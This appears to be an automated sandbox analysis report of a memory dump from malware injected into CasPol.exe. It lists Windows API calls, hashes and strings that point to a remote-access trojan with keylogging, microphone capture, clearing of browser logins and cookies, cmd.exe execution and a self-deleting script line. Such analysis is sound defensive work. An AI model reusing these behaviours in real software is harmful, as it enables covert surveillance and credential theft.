  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "$8>G
• API String ID: 368326130-2663660666
• Opcode ID: c4263464be22f02838b4d8536b2b9f3deae672e2af24e6496d28b6afc4a6d1c8
• Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
• Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99

APIs
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
• ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
• ExitProcess.KERNEL32 ref: 0040C63E
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: CreateExecuteExitFileProcessShell
• String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
• API String ID: 2309964880-3562070623
• Opcode ID: 7ccb560838e9c1dbc86872375eaf463d2dff220a3970af6a006826db3667550d
• Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
• Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A

APIs
• CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
• CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 37852cb36ddf9343104c0579adaedb1d6044286f869547d9c6730b709b6f6d7f
• Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
• Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB

APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
• CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
Memory Dump Source
• Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              • API ID: CreateThread$LocalTime$wsprintf
                                                                              • String ID: Online Keylogger Started
                                                                              • API String ID: 112202259-1258561607
                                                                              • Opcode ID: cb4b4d00bd1f48587d0ff016746fdd274eca288aaf42b5913708234c7b45ab26
                                                                              • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                              • Opcode Fuzzy Hash: cb4b4d00bd1f48587d0ff016746fdd274eca288aaf42b5913708234c7b45ab26
                                                                              • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                              • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                              • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                              • String ID: `@
                                                                              • API String ID: 2583163307-951712118
                                                                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                              • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                              • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                              APIs
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                              • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                              • String ID: Connection Timeout
                                                                              • API String ID: 2055531096-499159329
                                                                              • Opcode ID: 6ad77e449ea0c8f5081632a4e06be94507840fe6c7293467847821b6de829208
                                                                              • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                              • Opcode Fuzzy Hash: 6ad77e449ea0c8f5081632a4e06be94507840fe6c7293467847821b6de829208
                                                                              • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                              • String ID: bad locale name
                                                                              • API String ID: 3628047217-1405518554
                                                                              • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                              • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                              • Opcode Fuzzy Hash: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                              • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExecuteShell
                                                                              • String ID: /C $cmd.exe$open
                                                                              • API String ID: 587946157-3896048727
                                                                              • Opcode ID: 7d804f516a62bf7a6255b3e0914bf23257692c2765e93924c49a27dcea95556c
                                                                              • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                              • Opcode Fuzzy Hash: 7d804f516a62bf7a6255b3e0914bf23257692c2765e93924c49a27dcea95556c
                                                                              • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                              APIs
                                                                              • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                              • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                              • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: TerminateThread$HookUnhookWindows
                                                                              • String ID: pth_unenc
                                                                              • API String ID: 3123878439-4028850238
                                                                              • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                              • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                              • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                              • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: GetCursorInfo$User32.dll
                                                                              • API String ID: 1646373207-2714051624
                                                                              • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                              • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                              • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                              • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                              • API String ID: 2574300362-1519888992
                                                                              • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                              • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                              • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                              • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __alldvrm$_strrchr
                                                                              • String ID:
                                                                              • API String ID: 1036877536-0
                                                                              • Opcode ID: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                              • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                              • Opcode Fuzzy Hash: cfbea5d81bad18927c52dc2d7c807fc438def7d9cc968ab0b503f6547692f02c
                                                                              • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                              • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                              • Opcode Fuzzy Hash: d8b583558f75d554b20f0fedcbaebc1f151a0833ef22d7844c2f17114d5a19f4
                                                                              • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 3360349984-0
                                                                              • Opcode ID: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                              • Opcode Fuzzy Hash: b29a8bcc01a21f7fe38ddc3438b80264c3974fc0b274f3a4a7c26760eb770a85
                                                                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                              APIs
                                                                              Strings
                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                              • API String ID: 3472027048-1236744412
                                                                              • Opcode ID: f67da73cb2a02539f4d7dbc2d65eb95b4f98d554b542dc907f6a3b7988cd3d28
                                                                              • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                              • Opcode Fuzzy Hash: f67da73cb2a02539f4d7dbc2d65eb95b4f98d554b542dc907f6a3b7988cd3d28
                                                                              • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                              APIs
                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenQuerySleepValue
                                                                              • String ID: @CG$exepath$BG
                                                                              • API String ID: 4119054056-3221201242
                                                                              • Opcode ID: 4b5d4860d097bb15903a365519ba02cddbdb2c7d02e23e68ccb2f20ada22baa5
                                                                              • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                              • Opcode Fuzzy Hash: 4b5d4860d097bb15903a365519ba02cddbdb2c7d02e23e68ccb2f20ada22baa5
                                                                              • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                              APIs
                                                                                • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                              • String ID: [ $ ]
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5EB
                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B5FF
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                              APIs
                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                              • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                              • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                              • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                              • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                              • API ID: MetricsSystem
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                              • API ID: CloseHandleOpenProcess
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                              • API ID: ErrorHandling__start
                                                                              • String ID: pow
                                                                              APIs
                                                                              • API ID: CountEventTick
                                                                              • String ID: >G
                                                                              APIs
                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                              • API ID: Info
                                                                              • String ID: $fD
                                                                              APIs
                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509B9
                                                                              • String ID: ACP$OCP
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                              Strings
                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                              • API ID: LocalTime
                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • API ID: LocalTime
                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                              APIs
                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                              • API ID: ExistsFilePath
                                                                              • String ID: alarm.wav$xIG
                                                                              • API String ID: 1174141254-4080756945
                                                                              • Opcode ID: 5e2cc61e5469dce6cd81fe38bc9b3898a15368567c28f87c540c39d025e7a3e9
                                                                              • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                              • Opcode Fuzzy Hash: 5e2cc61e5469dce6cd81fe38bc9b3898a15368567c28f87c540c39d025e7a3e9
                                                                              • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                              APIs
                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                              • String ID: Online Keylogger Stopped
                                                                              • API String ID: 1623830855-1496645233
                                                                              • Opcode ID: 319d7400761289b2542cd9082559967ddf1120e6fa0471cb6b6b4a5462119b43
                                                                              • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                              • Opcode Fuzzy Hash: 319d7400761289b2542cd9082559967ddf1120e6fa0471cb6b6b4a5462119b43
                                                                              • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                              APIs
                                                                              • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                              • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wave$BufferHeaderPrepare
                                                                              • String ID: T=G
                                                                              • API String ID: 2315374483-379896819
                                                                              • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                              • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                              • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                              • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                              APIs
                                                                              • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LocaleValid
                                                                              • String ID: IsValidLocaleName$j=D
                                                                              • API String ID: 1901932003-3128777819
                                                                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                              • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                              • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID: T=G$T=G
                                                                              • API String ID: 3519838083-3732185208
                                                                              • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                              • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                              • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                              • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                              APIs
